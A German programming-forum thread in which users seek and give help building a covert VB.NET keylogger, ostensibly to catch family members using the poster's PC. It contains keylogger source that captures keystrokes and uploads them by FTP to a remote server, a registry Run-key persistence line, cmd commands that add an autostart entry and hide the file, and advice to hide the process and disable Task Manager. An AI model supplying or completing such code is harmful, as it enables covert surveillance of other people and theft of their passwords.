Keylogger Code fuer meinen pc!!

  • VB.NET

Es gibt 35 Antworten in diesem Thema. Der letzte Beitrag () ist von Manschula.

    Keylogger Code fuer meinen pc!!

    Hallo Leute =)
    Ich möchte hiermit klarstellen das ihr euch keinerlei Strafbar macht wenn ihr mir helft das ich diesen Keylogger fuer meinen Pc habe will. Ich möchte gucken ob jemand mit meinem Pc on geht wenn ich z.b. ich der Schule bin (mein Vater oder so ).
    Ich möchte sozusagen ein Protokoll von meinen pc^^.
    Ich bitte euch mir zu helfen weil morgen früh soll der schon fertig sein ^^.
    (Es kann sein das einige fehler drinne sind da ich hier erstmal anfange zu coden und später dan kopiere aus dem folgenden text , also das ganze soll per ftp gehen):

    VB.NET-Quellcode

    1. Public Class Form1
    2. Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Integer) As Integer
    3. Public Function getkeypress() As Integer
    4. For i As Integer = 1 To 255
    5. If GetAsyncKeyState(i) = -32767 Then
    6. Return i
    7. End If
    8. Next i
    9. End Function
    10. Private Sub Form1_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    11. Timer1.Enabled = TrueTimer2.enabled
    12. End Sub
    13. Private Sub Form1_Resize(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Resize
    14. TextBox1.Width = Me.Width - 30
    15. TextBox1.Height = Me.Height - 80
    16. End Sub
    17. Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    18. Dim key As Integer = getkeypress()
    19. If key <> 0 Then
    20. TextBox1.Text &= CStr(Chr(key)) 'CStr(Chr(key))
    21. Else : End If
    22. End Sub
    23. Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.TickDim wcl As New Net.WebClient
    24. wcl.Credentials = New Net.NetworkCredential("meinBenutzername", "meinPasswort")
    25. wcl.UploadString("ftp://meinserver^^.de/deineTextdatei.txt", TextBox1.Text)
    26. End Class

    So jetz habe ich ein paar Fragen (habe diese zwar schon auch im forum gesehen aber manchmal klappt das bei mir nich ?!)
    Also wie mache ich die Form unsichtbar auch fuer taskmanager ?
    Kann ich es vieleicht machen das ich noch eine Andere exe mache , die diesen Keylogger als ressource hat und dann irgentwie .create oder sowas xD? und die dan gleich den Keylogger in ein bestimmtes verzeichnes tut sowie My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Mein Programm"
    , "Pad zur Datei.exe", _
    Microsoft.Win32.RegistryValueKind.String)
    ? bitte um hilfe ^^ mfg Kevin
    Dafür bräuchtest du ein 2. Programm (bzw. Dienst, damit er im Taskmanager nicht angezeigt wird), dass kontrolliert, ob dein Programm noch laüft, bzw. schon gelöscht wurde und dann dein Programm wo anders hinkopiert. Das geht aber schwer, wenn du das als Dienst machst (das 1. Programm)

    lg
    Wen er sich gut am PC auskennt, wird er immer herauskriegen, ob dieses Programm läuft oder nicht. Damit sich dein Programm automatisch starten, musst du das als Programm in den Autostarteintragen und bei einem Dienst den Starttyp auf automatisch stellen.

    lg

    Versuch mal das

    Du könntest wenn das Programm jedesmal neustarten soll einen Eintrag in die Registry machen.
    Aber dann die Datei verstecken, ich zeig dir ma wie ichs per CMD machen würde, und bei dem Beispiel mal angenommen dein Programm befindet sich auf C:\Windows:

    DAS hier ins CMD (im Beispiel heißt dein Programm Keylog.exe):

    -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v KLG /t REG_SZ /d %Systemroot%\Keylog.exe /f
    attrib +r +a +s +h %windir%\keylog.exe
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    Dann musst du nur noch den Taskmanager über die Registry aus deaktivieren und fertig, oder...
    Ich hab aber den Registry Schlüssel dahin gerade nicht zur hand, klick einfach auf Suchen - Werte und suche nach "DisableTaskmanager", dann müssts gehen
    Hello World
    Es tut mir leid, dass ich jetzt einen auf Leichenschänder mache und einen so alten Thread auskram...aber vielleicht wird mir trotzdem geholfen.

    Ich bin nicht gerade sehr fortgebildet in diesem Gebiet..würde dieses Tool aber auch brauchen..für denselben Zweck.

    Jetzt hab ich mehrere Fragen:
    -Was ist ein TrueTimer? Also es wurde als ich den Code eingefügt hab geschrieben Timer1 wurde nicht deklariert und TrueTimer2 wurde nicht deklariert. Timer1 hab ich^^ aber TrueTimer ? was das?
    -Wie behebe ich die Meldung: Fehler 5 Die Handles-Klausel erfordert eine WithEvents-Variable, die im enthaltenden Typ oder einem seiner Basistypen definiert wird. Z22 S97
    -Wie behebe ich: Fehler 8 "end of"-Anweisung erwartet. Z28 S108
    -Was ist "wcl"? Er meint ich soll "wcl" Deklarieren...was ist das? Fehler 10 Der Name "wcl" wurde nicht deklariert. Z30 S9

    Vielen Dank im Vorraus,
    Nein.
    Über ihn kann ich nicht urteilen...ich jedoch hab den verdacht (Mein bruder ist seit 2 Wochen krank und morgens immer allein zuhaus) das mein Bruder wärend ich in der schule bin meinen PC verwendet. Dies möchte ich gern von der Schule aus schon wissen also möchte ich auch das es in eine txt datei auf meinem server geschrieben wird, damit ich evtl. meine mutter übers handy informieren kann und sie (sie arbeitet nur einmal um den block) ihn evtl. mal auf frischer tat ertappt. Dazu muss es auf einen server. Ich werd die exe dann schlicht in die autostart kloppen.


    DiamonD schrieb:

    du musst diese controls auch hinzufügen als rechts ist so eine leiste
    Mh...ich verstehs leider nicht..man muss ja im form die ganzen sachen hinzufügen aus der Toolbox...das hab ich alles gemacht bis auf die Dinge die ich oben geschrieben habe.

    Edit: Ich hab das mit dem Webclient jetzt ma hinbekommen...jetzt meint er noch

    Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.TickDim wcl As New Net.WebClient
    wcl.Credentials = New Net.NetworkCredential("meinBenutzername", "meinPasswort")
    wcl.UploadString("ftp://meinserver^^.de/deineTextdatei.txt", TextBox1.Text)
    End Sub
    End Class


    Da müsste ein "End Of" rein
    und was ich garnicht kapier:
    "Die Handles-Klausel erfordert eine WithEvents-Variable, die im enthaltenden Typ oder einem seiner Basistypen definiert wird."
    Ähm? Auf deutsch bitte :D

    Wäre nett wenn mir jemand sagen könnte wo ich jetzt noch was hinschreiben muss?

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „Nein“ ()

    ihr glaubt denen wirklich :?:
    schaut mal auf YouTube, da gibts jede Menge dieser T00Ls (behaupten sie hätten es selbst erstellt) und geben ne Anleitung dazu auf YouTube -_-
    würd ihnen nichts sagen X(

    @Admin^ ^
    Mein Gott dann glaubs eben nicht^^ wie billig wär das denn^^ Ich hoffe ganz einfach auf jem. der mir noch ein wenig Hilft..was in diesem Board ja laut Thema so sein sollte oder?
    Was bitte soll ich auf Youtube machen? Wozu ich es brauche, hab ich bereits erklärt..

    Ich könnte jetzt auch jemand sein der ins Gulli:Board o.ä. rennt "Gib ma downloadlink zu nem keylogger" aber
    a.) versuch ich was dabei zu lernen
    und b.) Hab ich ohne einblick in den sourcecode auch keine gewissheit, das ich nicht meine eigenen passwörter und co auf einen wildfremden ftp lade.

    Greetz & Schönen Abend.
    @Nein
    Schreibt man ins Gulli:Board bekommt (wenn überhaupt) man 90% links zu nem Virus (hast du warscheinlich eh schon versucht) :!:
    Ich kenne Seiten zu vierenfreien Keyloggern und anderen Tools (sogar auf Deutsch) geb ich dir natürlich nich (muhaha)
    Natürlich, jetzt hilfst du ihm einen Keylogger zu bauen und dann ;( du wenn er dein Passwort gestohlen hat (oder wie schon oben genannt, er es bei YouTube einstellt und sonstwer deine Passwörter etc. stiehlt)
    Komm ich etwa rüber wie n """EliteHacker""" ?( I'd RTFM, but I can't UTFM
    Tooollll du hast seinen Webspace, kannst meinen auch gleich habn

    ph4342 m3 1337 44xX02 5k111Zz :)

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „VB-08“ ()